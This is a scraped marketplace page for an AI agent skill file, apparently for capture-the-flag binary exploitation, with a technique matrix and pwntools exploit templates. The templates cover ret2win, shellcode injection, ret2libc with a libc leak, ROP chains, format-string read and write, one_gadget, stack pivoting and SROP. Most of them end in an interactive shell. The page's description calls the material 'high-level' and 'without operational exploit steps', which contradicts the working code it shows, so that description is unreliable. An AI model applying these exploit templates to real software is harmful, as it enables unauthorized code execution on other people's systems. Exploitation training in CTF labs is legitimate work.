A technique to redirect execution to a known win function when protections permit a direct address overwrite.

When should I use ROP vs ret2libc?

Use ROP when multiple operations or constraints prevent a single call; use ret2libc when a simple path to a libc function suffices and protections permit a return-oriented redirect.

How do I compute libc/base addresses safely?

Rely on safe, lab-based address leaks to determine base addresses and then adapt payloads; the skill covers the high-level approach without operational exploit steps.

PWN Exploit Development

npx machina-cli add skill allsmog/pwn-claude-plugin/exploit-development --openclaw

Files (1)

SKILL.md

7.0 KB

PWN Exploit Development

Overview

Exploit development transforms vulnerability findings into working payloads. This skill provides protection-aware technique selection and payload construction guidance for common exploitation scenarios.

Technique Selection Matrix

Choose technique based on protections:

Scenario	Protections	Technique
ret2win	No PIE, No canary, NX	Direct address overwrite
Shellcode	No NX, No PIE	Stack shellcode injection
ret2libc	NX, No PIE	Return to system/execve
ROP	NX, Partial RELRO	ROP chain execution
Leak + ret2libc	NX, PIE	Leak base, then ret2libc
Canary bypass	Stack canary	Leak canary first
Full RELRO	Full RELRO	__malloc_hook, stack pivot

Technique 1: ret2win

When: Win function exists, no PIE, no canary

from pwn import *

elf = ELF('./binary')
io = process('./binary')

# Payload: padding + win address
payload = b'A' * offset
payload += p64(elf.symbols['win'])

io.sendline(payload)
io.interactive()

Stack alignment (x64): If segfault on movaps, add a ret gadget:

ret = elf.search(asm('ret')).__next__()
payload = b'A' * offset
payload += p64(ret)  # Stack alignment
payload += p64(elf.symbols['win'])

Technique 2: Shellcode Injection

When: NX disabled, executable stack

from pwn import *

context.arch = 'amd64'
elf = ELF('./binary')
io = process('./binary')

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Find buffer address (may need leak or fixed)
buf_addr = 0x7fffffffe000  # Example - find via debugging

# Payload: shellcode + padding + return to buffer
payload = shellcode
payload += b'A' * (offset - len(shellcode))
payload += p64(buf_addr)

io.sendline(payload)
io.interactive()

Technique 3: ret2libc

When: NX enabled, libc available

Step 1: Find Gadgets

ROPgadget --binary ./binary | grep "pop rdi"
# Output: 0x0000000000401234 : pop rdi ; ret

Step 2: Find /bin/sh and system

from pwn import *

libc = ELF('./libc.so.6')
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.symbols['system']

Step 3: Build Payload

from pwn import *

elf = ELF('./binary')
libc = ELF('./libc.so.6')
io = process('./binary')

# Gadgets
pop_rdi = 0x401234  # From ROPgadget

# Leak libc address (e.g., via puts)
payload1 = b'A' * offset
payload1 += p64(pop_rdi)
payload1 += p64(elf.got['puts'])
payload1 += p64(elf.plt['puts'])
payload1 += p64(elf.symbols['main'])  # Return to main

io.sendline(payload1)
io.recvuntil(b'\n')  # Skip prompt
leak = u64(io.recv(6).ljust(8, b'\x00'))

# Calculate libc base
libc.address = leak - libc.symbols['puts']
log.info(f"libc base: {hex(libc.address)}")

# Second payload: system("/bin/sh")
payload2 = b'A' * offset
payload2 += p64(pop_rdi)
payload2 += p64(next(libc.search(b'/bin/sh')))
payload2 += p64(libc.symbols['system'])

io.sendline(payload2)
io.interactive()

Technique 4: ROP Chain

When: Complex constraints, need multiple operations

from pwn import *

elf = ELF('./binary')
rop = ROP(elf)

# Build ROP chain
rop.call('puts', [elf.got['puts']])
rop.call('main')

payload = b'A' * offset + rop.chain()

Common ROP Gadgets

# Find gadgets
ROPgadget --binary ./binary --only "pop|ret"

# Essential gadgets (x64)
# pop rdi ; ret      - First argument
# pop rsi ; pop r15 ; ret  - Second argument
# pop rdx ; ret      - Third argument (rare)

Technique 5: Format String

When: printf(user_input) vulnerability

Arbitrary Read

# Read from address
target = 0x404040  # Address to read
payload = f'%7$s'.encode() + p64(target)
# Adjust %7 based on offset testing

Arbitrary Write

from pwn import *

# Write value to address using %n
target = 0x404040
value = 0x1234

# Write 2 bytes at a time for reliability
writes = {target: value}
payload = fmtstr_payload(offset, writes)

Find Format String Offset

# Send pattern to find offset
for i in range(1, 20):
    io.sendline(f'AAAA%{i}$p'.encode())
    if b'0x41414141' in io.recvline():
        print(f"Offset: {i}")
        break

Technique 6: one_gadget

When: Need simple libc shell without ROP

one_gadget ./libc.so.6
# Output shows constraints and addresses

# Use one_gadget address (add to libc base)
one_gadget_offset = 0xe3b01  # From one_gadget output
shell = libc.address + one_gadget_offset

# Ensure constraints are satisfied (often rsp+0x70 == NULL)
payload = b'A' * offset + p64(shell)

Technique 7: Stack Pivot

When: Limited overflow space, need larger ROP chain

# Pivot to controlled buffer
leave_ret = 0x401234  # leave ; ret gadget
fake_rbp = buffer_addr - 8  # Point to ROP chain location

payload = b'A' * (offset - 8)  # Fill to saved RBP
payload += p64(fake_rbp)        # New RBP
payload += p64(leave_ret)       # Pivot

Technique 8: SROP (Sigreturn-Oriented Programming)

When: Minimal gadgets, can trigger sigreturn

from pwn import *

context.arch = 'amd64'

# Build sigreturn frame
frame = SigreturnFrame()
frame.rax = 59          # execve syscall
frame.rdi = bin_sh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret

payload = b'A' * offset
payload += p64(pop_rax_ret)
payload += p64(15)  # sigreturn syscall number
payload += p64(syscall_ret)
payload += bytes(frame)

Pwntools Template

See ${CLAUDE_PLUGIN_ROOT}/templates/exploit-template.py for complete template.

Output Format

## Exploit Development

### Technique Selection
- Vulnerability: Buffer overflow (gets)
- Protections: NX, Partial RELRO, No PIE, No Canary
- Selected technique: ret2libc via puts leak

### Payload Structure
1. Stage 1 (leak): padding + pop_rdi + puts@got + puts@plt + main
2. Stage 2 (shell): padding + pop_rdi + /bin/sh + system

### Key Addresses
- pop rdi gadget: 0x401234
- puts@plt: 0x401030
- puts@got: 0x404018
- main: 0x401150

### Exploit Code
[Generated pwntools script]

### Testing Notes
- Works locally with provided libc
- Remote may need libc identification

Additional Resources

Templates

Exploit templates available at ${CLAUDE_PLUGIN_ROOT}/templates/:

ret2win.py - Simple ret2win
ret2libc.py - ret2libc with leak
format-string.py - Format string exploitation
rop-chain.py - Generic ROP template
shellcode.py - Shellcode injection
heap-basic.py - Basic heap exploitation
srop.py - Sigreturn-oriented programming

References

references/rop-gadgets.md - Common gadget patterns
references/one-gadget.md - Using one_gadget effectively
references/heap-techniques.md - Heap exploitation overview

Source

git clone https://github.com/allsmog/pwn-claude-plugin/blob/main/pwn-htb/skills/exploit-development/SKILL.mdView on GitHub

Overview

Exploit development translates vulnerability findings into actionable payloads. It offers a protection-aware technique selection matrix and practical payload construction guidance for common exploitation scenarios like ret2win, shellcode, ret2libc, and ROP, tailored to protections such as PIE, NX, canaries, and RELRO.

How This Skill Works

The skill uses a Technique Selection Matrix to map scenarios to techniques based on protections (PIE, canary, NX, RELRO). It provides high-level workflows and safe, example-focused guidance that emphasizes defensive awareness and lab-grade testing instead of implementation details.

When to Use It

Ret2win: when a win function exists and there is no PIE or canary.
Shellcode Injection: when NX is disabled and the stack is executable.
Ret2libc: when NX is enabled but libc is available.
ROP Chain: when complex constraints require multiple operations.
Leak + ret2libc: when you can leak a libc/base address first.

Quick Start

Step 1: Audit protections in the target binary (PIE, canary, NX, RELRO).
Step 2: Pick a technique from the matrix based on the protections present.
Step 3: Implement a high-level payload workflow in a safe lab and verify results.

Best Practices

Assess protections first (PIE, canary, NX, RELRO) before choosing a technique.
Prefer minimal, reliable gadgets and validate addressing for 64-bit targets.
Plan address leaks safely to compute base addresses and adapt payloads.
Test thoroughly in isolated lab environments and document findings for reproducibility.
Avoid sharing sensitive exploit-ready details; focus on concepts and safe workflows.

Example Use Cases

Choosing a technique based on a binary's protection profile (no PIE, no canary) to apply ret2win concepts in a lab setting.
Canary bypass concept: outline the idea of leaking the canary first in a controlled environment.
Ret2libc approach: conceptually align libc base discovery with a simple control-flow redirect to system.
ROP chain conceptualization: assembling a chain to perform multiple operations under NX/Partial RELRO.
Format string vulnerability at a high level: leverage vulnerabilities to achieve an arbitrary read in a safe, lab-only scenario.

Frequently Asked Questions

Add this skill to your agents

PWN Exploit Development

PWN Exploit Development

Overview

Technique Selection Matrix

Technique 1: ret2win

Technique 2: Shellcode Injection

Technique 3: ret2libc

Step 1: Find Gadgets

Step 2: Find /bin/sh and system

Step 3: Build Payload

Technique 4: ROP Chain

Common ROP Gadgets

Technique 5: Format String

Arbitrary Read

Arbitrary Write

Find Format String Offset

Technique 6: one_gadget

Technique 7: Stack Pivot

Technique 8: SROP (Sigreturn-Oriented Programming)

Pwntools Template

Output Format

Additional Resources

Templates

References

Source

Overview

How This Skill Works

When to Use It

Quick Start

Best Practices

Example Use Cases

Frequently Asked Questions

What is ret2win?

When should I use ROP vs ret2libc?

How do I compute libc/base addresses safely?